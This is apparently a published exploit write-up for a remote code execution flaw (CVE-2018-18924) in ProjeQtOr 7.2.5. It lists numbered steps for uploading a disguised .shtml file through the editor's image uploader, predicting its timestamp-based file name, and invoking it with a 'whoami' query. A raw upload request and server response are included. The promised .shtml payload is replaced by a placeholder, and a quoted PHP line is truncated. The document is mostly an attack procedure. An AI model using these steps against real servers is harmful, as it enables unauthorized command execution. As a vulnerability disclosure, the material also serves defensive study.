# Exploit Title: ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution # Date: 2018-10-22 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) # Contact: https://pentest.com.tr # Vendor Homepage: https://www.projeqtor.org # Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV7.2.5.zip/download # Version: v7.2.5 # Category: Webapps # Tested on: XAMPP for Linux 7.2.8-0 # CVE: CVE-2018-18924 # Description : ProjeQtOr PMT 7.2.5 and lower versions allows to upload arbitrary "shtml" files which # leads to a remote command execution on the remote server. # 1) Create a file with the below HTML code and save it as .shtml # 2) Login to ProjeQtOr portal as priviliage user # 3) You can perform this operation in the ckeditor fields. # 4) Click (Image) button on Content panel. # 5) Chose Upload section and browse your .shtml file. # 6) Click "Send it to Server". Script will give you "This file is not a valid image." error. # But it will send the file to the server. Just we need to find the file. # 7) We can read how the uploaded files are named in the # "/tool/uploadImage.php" file.(line 90) id.'_'.$uploadedFile['name']; ?> # 8) The name of our file should be; Y = Years, numeric, at least 2 digits with leading 0 m = Months, numeric d = Days, numeric H = Hours, numeric, at least 2 digits with leading 0 i = Minutes, numeric s = Seconds, numeric # We must save the date and time of the upload moment. Formula : Y+m+d+H+i+s+_+UserID+_+filename = uploaded file name # For Example; If you uploaded a file called "RCE.shtml" on 2018.10.23 at 01:02:30 # the file name will be "20181023010230_1_RCE.shtml" # 9) Finaly all uploaded images are sent under the "/files/images/" folder. # 10) Verift the exploit: http://domain/files/images/20181023010230_1_RCE.shtml?whoami The request: POST /tool/uploadImage.php?CKEditor=result&CKEditorFuncNum=80&langCode=en HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/view/main.php Cookie: projeqtor=cd3d5cf676e8598e742925cfd2343696; ckCsrfToken=7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n; PHPSESSID=bc0a9f0a918ccf0deae6de127d9b73e0 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------1783728277808111921873701375 Content-Length: 550 -----------------------------1783728277808111921873701375 Content-Disposition: form-data; name="upload"; filename="RCE.shtml" Content-Type: text/html [shtml file content] -----------------------------1783728277808111921873701375 Content-Disposition: form-data; name="ckCsrfToken" 7o1qC0Wtz7Z5QjiZ8cFuzc6yjnWdLjiHMeTalZ6n -----------------------------1783728277808111921873701375-- HTTP/1.1 200 OK Date: Mon, 23 Oct 2018 01:02:30 GMT